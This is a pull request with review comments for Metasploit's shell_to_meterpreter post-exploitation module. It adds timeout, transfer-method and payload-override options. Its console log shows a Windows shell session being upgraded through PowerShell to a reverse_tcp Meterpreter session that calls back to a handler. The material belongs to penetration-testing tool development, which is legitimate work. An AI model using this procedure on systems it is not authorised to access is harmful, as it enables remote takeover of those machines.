### PR TITLE
shell_to_meterpreter - more options, more verbose

### PR DESCRIPTION
**Pull request by g0tmi1k**
More options, more verbose ...less bugs!
- Display/Verbose: Can show what stage it is up in (and in depth).
- New option: Timeout value. Default was 10 (and static), now 30 (and dynamic).
- New option: Overwrite payload (so if you wish to use python/meterpreter/reverse_http) instead.
- New option: Transfer method (Windows only. So it doesn't have to use powershell).
- Bug fix: Doesn't try and upgrade a Meterpreter shell (as it would crash out).
## Example

```
msf exploit(handler) > use post/multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf post(shell_to_meterpreter) > set VERBOSE true
VERBOSE => true
msf post(shell_to_meterpreter) > show options 

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start exploit/multi/handler to receive the connection.
   LHOST    192.168.0.4      no        IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for payload to connect to.
   SESSION  1                yes       The session to run this module on.

msf post(shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Platform: Windows
[*] Upgrade payload: windows/meterpreter/reverse_tcp
[*] Starting exploit/multi/handler
[*] Started reverse handler on 192.168.0.4:4433 
[*] Starting the payload handler...
[*] Transfer method: Powershell
[*] Powershell command length: 5463
[*] Cleaning up handler
[*] Post module execution completed
msf post(shell_to_meterpreter) > 
[*] Sending stage (882688 bytes) to 192.168.0.8
[*] Meterpreter session 2 opened (192.168.0.4:4433 -> 192.168.0.8:51575) at 2015-06-13 18:15:29 +0100

msf post(shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Type                   Information                                                                       Connection
  --  ----                   -----------                                                                       ----------
  1   shell windows          Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation...  192.168.0.4:443 -> 192.168.0.8:51571 (192.168.0.8)
  2   meterpreter x86/win32  <REMOVED> @ <REMOVED>                                                             192.168.0.4:4433 -> 192.168.0.8:51575 (192.168.0.8)

msf post(shell_to_meterpreter) >
```

...also works with `session -u 1`.

This all came about because the 10 second wait time wasn't enough (and would always time out).

### CODE REVIEW

**Comment by wvu-r7** [comment]
@g0tmi1k! :)

File: modules/post/multi/manage/shell_to_meterpreter.rb [hunk 1]
```diff
@@ -31,16 +31,29 @@ def initialize(info = {})
...
-          [false, 'Port for Payload to connect to.', 4433]),
+          [false, 'Port for payload to connect to.', 4433]),
         OptBool.new('HANDLER',
-          [ true, 'Start an Exploit Multi Handler to receive the connection', true])
+          [ true, 'Start an exploit/multi/handler to receive the connection', true])
       ], self.class)
+    register_advanced_options([
+      OptInt.new('HANDLE_TIMEOUT',
+        [false, 'How long to wait for the session to come back', 30]),
+      OptString.new('WIN_TRANSFER',
```
Comment (wvu-r7) [inline modules/post/multi/manage/shell_to_meterpreter.rb]: This should be an ```OptEnum```.

File: modules/post/multi/manage/shell_to_meterpreter.rb [hunk 2]
```diff
@@ -31,16 +31,29 @@ def initialize(info = {})
...
+        [false, 'Which method to try first to transfer files on a Windows target. Valid values are: POWERSHELL, VBS', 'POWERSHELL']),
+      OptString.new('PAYLOAD_OVERWRITE',
```
Comment (wvu-r7) [inline modules/post/multi/manage/shell_to_meterpreter.rb]: Can you rename this option and reword its description? It's not clear what it does (sets a different payload by name).

Comment (wvu-r7) [inline modules/post/multi/manage/shell_to_meterpreter.rb]: "Override" might be a better word.

**Comment by g0tmi1k** [comment]
:tada:

**Comment by g0tmi1k** [comment]
:tada:

**Pull request merged**